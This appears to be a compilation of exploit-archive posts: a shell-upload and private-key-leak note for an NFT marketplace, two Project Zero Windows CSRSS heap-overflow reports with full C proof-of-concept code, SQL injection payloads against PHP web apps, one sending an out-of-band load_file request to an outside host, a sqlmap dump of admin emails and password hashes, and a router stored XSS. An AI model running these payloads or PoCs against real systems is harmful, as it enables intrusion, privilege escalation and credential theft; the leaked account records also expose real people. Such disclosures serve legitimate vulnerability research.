<pre><code># Exploit Title: Gigaland NFT marketplace Shell upload and ETH private key leak <br /># Google Dork: N/A<br /># Date: 14/8/2022<br /># Exploit Author: Sohel Yousef https://www.linkedin.com/in/sohel-yousef-50a905189/<br /># Software Link: https://gigaland.io/<br /># Version: 1.9<br /># Category: webapps<br /><br />1. Shell Upload <br /><br />after connecting your wallet to the site, go to the edit profile section <br />on the link<br />localhost/artist/account<br />upload your shell in php format - there is no security check <br />your shell will be in this directory<br />storage/artist/profile/ ++ you can Inspect Element on the edit profile page to get the direct link <br /><br />2. Private key leak <br /><br />this link <br /><br />localhost//resources/privateJs/transfer.js<br /><br />contains the private key for the ethereum account <br /><br />const addressFrom = receiverAddress;<br />const privKey = '9f09d101c +++ HIDDEN ++++++ ac7bea0db0c25d2b5a3'<br /><br />async function transfer(addressto, data, history_id) {<br /><br /> debugger;<br /> const web3js = new Web3(rpcURL);<br /><br /> const contract = new web3js.eth.Contract(trabi, trcontractAddress, {});<br /><br /> const nonce = await web3js.eth.getTransactionCount(addressFrom, 'latest'); //get latest nonce<br /></code></pre>
<pre><code>Windows: heap buffer overflow in sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString<br /><br />## SUMMARY<br />A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.<br /><br /><br />## VULNERABILITY DETAILS<br />```<br />__int64 __fastcall BaseSrvActivationContextCacheDuplicateUnicodeString(UNICODE_STRING *Dst, UNICODE_STRING *Src)<br />{<br /> unsigned int Length; // ebx<br /> SIZE_T NewMaxLength; // r8<br /> WCHAR *Heap; // rax<br /> __int64 Status; // rax<br /><br /> Length = Src->Length;<br /> if ( (_WORD)Length )<br /> {<br /> NewMaxLength = (unsigned __int16)(Length + 2); // *** 1 ***<br /> Dst->MaximumLength = NewMaxLength;<br /> Heap = (WCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, NewMaxLength); // *** 2 ***<br /> Dst->Buffer = Heap;<br /> if ( Heap )<br /> {<br /> memcpy_0(Heap, Src->Buffer, Length); // *** 3 ***<br /> Dst->Buffer[(unsigned __int64)Length >> 1] = 0;<br /> Status = 0i64;<br /> Dst->Length = Length;<br /> }<br /> else<br /> {<br /> return 0xC0000017i64;<br /> }<br /> }<br /> else<br /> {<br /> *(_DWORD *)&Dst->Length = 0;<br /> Status = 0i64;<br /> Dst->Buffer = 0i64;<br /> }<br /> return Status;<br />}<br />```<br /><br />The function above attempts to reserve two extra bytes for a trailing null character. The new size gets truncated to a 16-bit value[1], so if the size of the source string is 0xfffe bytes, the function will try to allocate a 0-byte buffer[2] and copy 0xfffe bytes into it[3].<br /><br />The vulnerable function is reachable from the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine. However, the default size of the CSR shared memory section is only 0x10000 bytes, and some of that space must be reserved for the capture buffer header, so by default it's impossible to pass a big enough `UNICODE_STRING` to CSRSS. 
Luckily, the size of the section is controlled entirely by the client process, and if an attacker can modify `ntdll!CsrpConnectToServer` early enough during process startup, they'll be able to pass strings of (virtually) any size.<br /><br /><br />## VERSION<br />Windows 11 12H2 (OS Build 22000.593)<br />Windows 10 12H2 (OS Build 19044.1586)<br /><br /><br />## REPRODUCTION CASE<br />This (not very reliable) proof-of-concept creates a new process in a suspended state, attempts to find and replace 32-bit value 0x10000 inside `CsrpConnectToServer`, and resumes the process' main thread. Then the child process sends a CSR request with a huge string.<br /><br /><br />1) Enable page heap verification for csrss.exe:<br />```<br />gflags /p /enable csrss.exe /full<br />```<br /><br />2) Restart the machine.<br /><br />3) Compile and run:<br /><br />```<br />#include <windows.h><br />#include <winternl.h><br />#include <string><br /><br />PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);<br />VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);<br />NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);<br />NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);<br /><br />void CaptureString(LPVOID capture_buffer,<br /> uint8_t* msg_field,<br /> PCWSTR string,<br /> size_t length = 0,<br /> size_t max_length = 0) {<br /> if (length == 0)<br /> length = lstrlenW(string);<br /><br /> CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,<br /> length * 2 + 2, (PSTR)msg_field);<br />}<br /><br />int main(int argc, char* argv[]) {<br /> HMODULE ntdll = LoadLibrary(L\"ntdll\");<br /><br /> if (argc == 1) {<br /> STARTUPINFO si = {0};<br /> PROCESS_INFORMATION pi = {0};<br /><br /> si.cb = sizeof(si);<br /><br /> WCHAR image_path[MAX_PATH + 1];<br /> GetModuleFileName(NULL, image_path, MAX_PATH);<br /><br /> std::wstring args = image_path;<br /> args += L\" child\";<br /> CreateProcess(&image_path[0], &args[0], NULL, NULL, FALSE, 
CREATE_SUSPENDED,<br /> NULL, NULL, &si, &pi);<br /><br /> PVOID csrClientConnectToServer =<br /> GetProcAddress(ntdll, \"CsrClientConnectToServer\");<br /><br /> size_t offset = 0;<br /> for (; offset < 0x1000; ++offset)<br /> if (*(uint32_t*)((char*)csrClientConnectToServer + offset) == 0x10000)<br /> break;<br /><br /> uint32_t new_size = 0x20000;<br /> WriteProcessMemory(pi.hProcess, (char*)csrClientConnectToServer + offset,<br /> &new_size, sizeof(new_size), NULL);<br /><br /> ResumeThread(pi.hThread);<br /> } else {<br />#define INIT_PROC(name) \\<br /> name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));<br /><br /> INIT_PROC(CsrAllocateCaptureBuffer);<br /> INIT_PROC(CsrFreeCaptureBuffer);<br /> INIT_PROC(CsrClientCallServer);<br /> INIT_PROC(CsrCaptureMessageString);<br /><br /> const size_t HEADER_SIZE = 0x40;<br /> uint8_t msg[HEADER_SIZE + 0x1f8] = {0};<br /><br />#define FIELD(n) msg + HEADER_SIZE + 8 * n<br />#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;<br /><br /> SET_FIELD(0, 0x900000041);<br /> SET_FIELD(3, 0x10101);<br /> SET_FIELD(6, 0x88);<br /> SET_FIELD(7, -1);<br /><br /> std::string manifest =<br /> \"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \"<br /> \"manifestVersion='1.0'>\"<br /> \"<assemblyIdentity name='A' version='1.0.0.0'/>\"<br /> \"</assembly>\";<br /><br /> SET_FIELD(8, manifest.c_str());<br /> SET_FIELD(9, manifest.size());<br /><br /> SET_FIELD(22, 1);<br /><br /> PVOID capture_buffer = CsrAllocateCaptureBuffer(3, 0x10200);<br /><br /> CaptureString(capture_buffer, FIELD(1), L\"\\x00\\x00\", 2);<br /> CaptureString(capture_buffer, FIELD(4), L\"C:\\\\Windows\\\<br />otepad.exe\");<br /> CaptureString(capture_buffer, FIELD(17), L\"C:\\\\A\\\\\");<br /> SET_FIELD(17, 0xfffefffe);<br /><br /> CsrClientCallServer(msg, capture_buffer, 0x1001001e,<br /> sizeof(msg) - HEADER_SIZE);<br /> }<br />}<br />```<br /><br />4) Wait for a crash:<br />```<br />CONTEXT: 000000bd41a3ddc0 -- (.cxr 
0xbd41a3ddc0)<br />rax=000002224855c000 rbx=000000000000fffe rcx=000002224855c010<br />rdx=fffffffff7ecde20 rsi=000000bd41a3ec48 rdi=000000000000fffe<br />rip=00007ffbd59d3c53 rsp=000000bd41a3eb08 rbp=000000bd41a3efc8<br /> r8=000000000000002e r9=00000000000003ff r10=000002224855c000<br />r11=0000022240439e1e r12=00000000000007a4 r13=0000000000000001<br />r14=000000bd41a3ee38 r15=000000bd41a3ee20<br />iopl=0 nv up ei pl nz na po nc<br />cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />ntdll!memcpy+0x113:<br />0033:00007ffb`d59d3c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:00000222`4855c000=????????????????????????????????<br />Resetting default scope<br /><br />WRITE_ADDRESS: 000002224855c000 <br /><br />EXCEPTION_RECORD: 000000bd41a3e2b0 -- (.exr 0xbd41a3e2b0)<br />ExceptionAddress: 00007ffbd59d3c53 (ntdll!memcpy+0x0000000000000113)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 0000000000000001<br /> Parameter[1]: 000002224855c000<br />Attempt to write to address 000002224855c000<br /><br />STACK_TEXT: <br />000000bd`41a3eb08 00007ffb`d2f34f24 : 00000000`00000000 00000000`0000fffe 00000000`00000000 00000000`00000000 : ntdll!memcpy+0x113<br />000000bd`41a3eb10 00007ffb`d2f34e4b : 000000bd`41a3ee20 000000bd`41a3ec30 00000000`00000000 00000222`3a760000 : sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString+0x64<br />000000bd`41a3eb40 00007ffb`d2f34d43 : 00000000`00000000 000000bd`41a3ee20 00000222`47868e20 00007ffb`d2d7b8b4 : sxssrv!BaseSrvActivationContextCacheDuplicateKey+0x4b<br />000000bd`41a3eb70 00007ffb`d2f34916 : 000000bd`41a3ed78 000000bd`41a3ee20 000000bd`41a3efd4 000000bd`41a3efe0 : sxssrv!BaseSrvActivationContextCacheCreateEntry+0x83<br />000000bd`41a3ebd0 00007ffb`d2f34018 : 00000000`00000000 00000000`00000000 00000000`00000000 000000bd`41a3f410 : sxssrv!BaseSrvActivationContextCacheInsertEntry+0x86<br />000000bd`41a3ed20 00007ffb`d2f31dce : 
00000000`000007f4 00000000`000000f0 00000000`00010244 00000000`00000000 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x818<br />000000bd`41a3f160 00007ffb`d2fb6490 : 00000222`3d0d0750 00000000`000000f0 00000222`4785ef30 00000222`3a877f80 : sxssrv!BaseSrvSxsCreateActivationContextFromMessage+0x32e<br />000000bd`41a3f2d0 00007ffb`d598265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0<br />000000bd`41a3f970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f<br />```<br /><br /><br />## CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />**This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-07-19.**<br /><br />Related CVE Numbers: CVE-2022-22049,CVE-2022-22049.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity<br /><br />## SUMMARY<br />A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.<br /><br /><br />## VULNERABILITY DETAILS<br />In 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`.<br /><br />We've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`.<br /><br />1. 
https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html<br /><br /><br />## VERSION<br />Windows 11 12H2 (OS Build 22000.593)<br />Windows 10 12H2 (OS Build 19044.1586)<br /><br /><br />## REPRODUCTION CASE<br />1) Enable page heap verification for csrss.exe:<br />```<br />gflags /p /enable csrss.exe /full<br />```<br /><br />2) Restart the machine.<br /><br />3) Compile and run:<br />```<br />#pragma comment(lib, "ntdll")<br /><br />#include <windows.h><br />#include <winternl.h><br />#include <cstdint><br />#include <cstdio><br />#include <string><br /><br />typedef struct _SECTION_IMAGE_INFORMATION {<br /> PVOID EntryPoint;<br /> ULONG StackZeroBits;<br /> ULONG StackReserved;<br /> ULONG StackCommit;<br /> ULONG ImageSubsystem;<br /> WORD SubSystemVersionLow;<br /> WORD SubSystemVersionHigh;<br /> ULONG Unknown1;<br /> ULONG ImageCharacteristics;<br /> ULONG ImageMachineType;<br /> ULONG Unknown2[3];<br />} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;<br /><br />typedef struct _RTL_USER_PROCESS_INFORMATION {<br /> ULONG Size;<br /> HANDLE ProcessHandle;<br /> HANDLE ThreadHandle;<br /> CLIENT_ID ClientId;<br /> SECTION_IMAGE_INFORMATION ImageInformation;<br /> BYTE Unknown1[128];<br />} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;<br /><br />NTSTATUS(NTAPI* RtlCreateProcessParameters)<br />(PRTL_USER_PROCESS_PARAMETERS*,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PVOID,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING);<br />NTSTATUS(NTAPI* RtlCreateUserProcess)<br />(PUNICODE_STRING,<br /> ULONG,<br /> PRTL_USER_PROCESS_PARAMETERS,<br /> PSECURITY_DESCRIPTOR,<br /> PSECURITY_DESCRIPTOR,<br /> HANDLE,<br /> BOOLEAN,<br /> HANDLE,<br /> HANDLE,<br /> PRTL_USER_PROCESS_INFORMATION);<br /><br />PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);<br />VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);<br 
/>NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);<br />NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);<br /><br />void CaptureString(LPVOID capture_buffer,<br /> uint8_t* msg_field,<br /> PCWSTR string,<br /> size_t length = 0) {<br /> if (length == 0)<br /> length = lstrlenW(string);<br /><br /> CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,<br /> length * 2 + 2, (PSTR)msg_field);<br />}<br /><br />int main() {<br /> HMODULE ntdll = LoadLibrary(L"ntdll");<br /><br />#define INIT_PROC(name) \<br /> name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));<br /><br /> INIT_PROC(RtlCreateProcessParameters);<br /> INIT_PROC(RtlCreateUserProcess);<br /><br /> INIT_PROC(CsrAllocateCaptureBuffer);<br /> INIT_PROC(CsrFreeCaptureBuffer);<br /> INIT_PROC(CsrClientCallServer);<br /> INIT_PROC(CsrCaptureMessageString);<br /><br /> UNICODE_STRING image_path;<br /> PRTL_USER_PROCESS_PARAMETERS proc_params;<br /> RTL_USER_PROCESS_INFORMATION proc_info = {0};<br /><br /> RtlInitUnicodeString(&image_path, L"\\SystemRoot\\notepad.exe");<br /> RtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL,<br /> NULL, NULL, NULL, NULL);<br /> RtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL,<br /> NULL, NULL, FALSE, NULL, NULL, &proc_info);<br /><br /> const size_t HEADER_SIZE = 0x40;<br /> uint8_t msg[HEADER_SIZE + 0x1f8] = {0};<br /><br />#define FIELD(n) msg + HEADER_SIZE + 8 * n<br />#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;<br /><br /> SET_FIELD(2, proc_info.ClientId.UniqueProcess);<br /> SET_FIELD(3, proc_info.ClientId.UniqueThread);<br /><br /> SET_FIELD(4, -1);<br /> SET_FIELD(7, 1);<br /> SET_FIELD(8, 0x20000);<br /><br /> std::string manifest =<br /> "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' "<br /> "manifestVersion='1.0'>"<br /> "<assemblyIdentity name='@' version='1.0.0.0'/>"<br /> "</assembly>";<br /> 
manifest.replace(manifest.find('@'), 1, 0x4000, 'A');<br /><br /> SET_FIELD(13, manifest.c_str());<br /> SET_FIELD(14, manifest.size());<br /><br /> PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200);<br /><br /> CaptureString(capture_buffer, FIELD(22), L"C:\\Windows\\");<br /> CaptureString(capture_buffer, FIELD(24), L"\x00\x00", 2);<br /> CaptureString(capture_buffer, FIELD(28), L"A");<br /> SET_FIELD(28, 0xff000002);<br /><br /> CsrClientCallServer(msg, capture_buffer, 0x1001001d,<br /> sizeof(msg) - HEADER_SIZE);<br />}<br />```<br /><br />The crash should look like to the following:<br />```<br />CONTEXT: 0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0)<br />rax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010<br />rdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001<br />rip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80<br /> r8=0000000000000032 r9=00000000000001f7 r10=00007ff822e6b558<br />r11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001<br />r14=0000000000000000 r15=0000000000000005<br />iopl=0 nv up ei pl nz na pe nc<br />cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />ntdll!memcpy+0x113:<br />0033:00007ff8`25a53c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=????????????????????????????????<br />Resetting default scope<br /><br />WRITE_ADDRESS: 0000020e6515d000<br /><br />EXCEPTION_RECORD: 0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0)<br />ExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 0000000000000001<br /> Parameter[1]: 0000020e6515d000<br />Attempt to write to address 0000020e6515d000<br /><br />STACK_TEXT:<br />0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x113<br />0000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 
0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c1<br />0000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd34<br />0000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d6<br />0000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x513<br />0000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x104<br />0000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe<br />0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x339<br />0000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed<br />0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x545<br />0000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x71<br />0000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f3<br />0000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0<br />0000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f<br />```<br /><br /><br />## CREDIT INFORMATION<br 
/>Sergei Glazunov of Google Project Zero<br /><br /><br />Related CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS<br />## Author: nu11secur1ty<br />## Date: 08.12.2022<br />## Vendor Homepage: https://www.mayurik.com/#download_section<br />## Software Link-0:<br />https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html<br />## Software Link-1:<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip<br /><br /><br />## Description:<br />The Gas Agency Management-2022 by Mayuri K suffers from multiple<br />vulnerabilities, which means this project must be deprecated<br />immediately!<br /><br />1. - SQLi: the username parameter is vulnerable to time-based blind<br />(query SLEEP) injection - input is not sanitized properly.<br />2. - Unauthenticated file upload - the upload function does not sanitize<br />file types - it is possible to upload .php files in the customer photo<br />section.<br />3. - Reflected XSS in the "add customer" section, in the address field.<br />4. - Web shell file upload - unauthenticated upload of arbitrary file<br />extensions, in this case a PHP web shell. After this, a malicious user<br />can execute the uploaded file remotely and completely destroy this<br />flawed system.<br />5. 
- STATUS: For termination of the project.<br /><br />[+]Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=mxiusQzi'+(select<br />load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''<br />AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--<br />FygL&password=r8H!r2a!U2&login=<br />---<br />```<br />[+]Unauthenticated Upload:<br />- - - in the video:https://streamable.com/opqz3n<br /><br />[+]XSS-Reflected:<br />- - - in the video:https://streamable.com/opqz3n<br /><br />[+]RCE:<br />- - - in the video:https://streamable.com/opqz3n<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/opqz3n)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : i-netsolution.com │ │ │<br />│ Vendor : i-Net Solution │ │ │<br />│ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │<br />│ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │<br />│ Method : GET │ │ and job seekers │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 
│<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> <br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'salary_to' is vulnerable.<br /><br />---<br />Parameter: salary_to (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437<br />---<br /><br />[+] Starting the Attack<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br /><br /><br />[INFO] fetching current database<br />current database: 'theminsall_jobportal_db'<br /><br /><br />[INFO] fetching tables for database: 'theminsall_jobportal_db'<br /><br />Database: theminsall_jobportal_db<br />[72 tables]<br 
/>+----------------------------------+<br />| admin_password_resets |<br />| admins |<br />| applicant_messages |<br />| blog_categories |<br />| blogs |<br />| career_levels |<br />| cities |<br />| cms |<br />| cms_content |<br />| companies |<br />| company_messages |<br />| company_password_resets |<br />| contact_messages |<br />| countries |<br />| countries_details |<br />| degree_levels |<br />| degree_types |<br />| failed_jobs |<br />| faqs |<br />| favourite_applicants |<br />| favourites_company |<br />| favourites_job |<br />| functional_areas |<br />| genders |<br />| industries |<br />| job_alerts |<br />| job_apply |<br />| job_apply_rejected |<br />| job_experiences |<br />| job_shifts |<br />| job_skills |<br />| job_titles |<br />| job_types |<br />| jobs |<br />| language_levels |<br />| languages |<br />| major_subjects |<br />| manage_job_skills |<br />| marital_statuses |<br />| migrations |<br />| ownership_types |<br />| packages |<br />| password_resets |<br />| payu_transactions |<br />| profile_cvs |<br />| profile_education_major_subjects |<br />| profile_educations |<br />| profile_experiences |<br />| profile_languages |<br />| profile_projects |<br />| profile_skills |<br />| profile_summaries |<br />| queue_jobs |<br />| report_abuse_company_messages |<br />| report_abuse_messages |<br />| result_types |<br />| roles |<br />| salary_periods |<br />| send_to_friend_messages |<br />| seo |<br />| site_settings |<br />| sliders |<br />| states |<br />| subscriptions |<br />| testimonials |<br />| unlocked_users |<br />| user_messages |<br />| users |<br />| videos |<br />| widget_pages |<br />| widgets |<br />| widgets_data |<br />+----------------------------------+<br /><br /><br />[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'<br /><br />Database: theminsall_jobportal_db<br />Table: admins<br />[8 columns]<br />+----------------+------------------+<br />| Column | Type |<br 
/>+----------------+------------------+<br />| created_at | timestamp |<br />| email | varchar(191) |<br />| id | int(10) unsigned |<br />| name | varchar(191) |<br />| password | varchar(191) |<br />| remember_token | varchar(100) |<br />| role_id | int(11) |<br />| updated_at | timestamp |<br />+----------------+------------------+<br /><br /><br />[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'<br /><br />Database: theminsall_jobportal_db<br />Table: admins<br />[3 entries]<br />+----+--------------------+--------------------------------------------------------------+-----------+<br />| id | email | password | name |<br />+----+--------------------+--------------------------------------------------------------+-----------+<br />| 3 | buyer@buyer.com | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer |<br />| 4 | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |<br />| 5 | admin@gmail.com | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |<br />+----+--------------------+--------------------------------------------------------------+-----------+<br /> Possible Algorithms: bcrypt $2*$, Blowfish (Unix)<br /><br /><br />[-] Done<br /><br /></code></pre>
<pre><code># Exploit Title: FiberHome - AN5506-02-B - RP2521 - Authenticated Stored XSS<br /># Date: 10/08/2022<br /># Exploit Author: Leonardo Goncalves<br /># Version: Firmware RP2521<br /><br />1) Log in to the equipment via your web browser<br />2) Go to Network > auth_settings<br />3) In the "sncfg_loid" field, inject the payload "<script>alert()</script>"<br />4) Click Save<br />5) Exploit!<br /></code></pre>
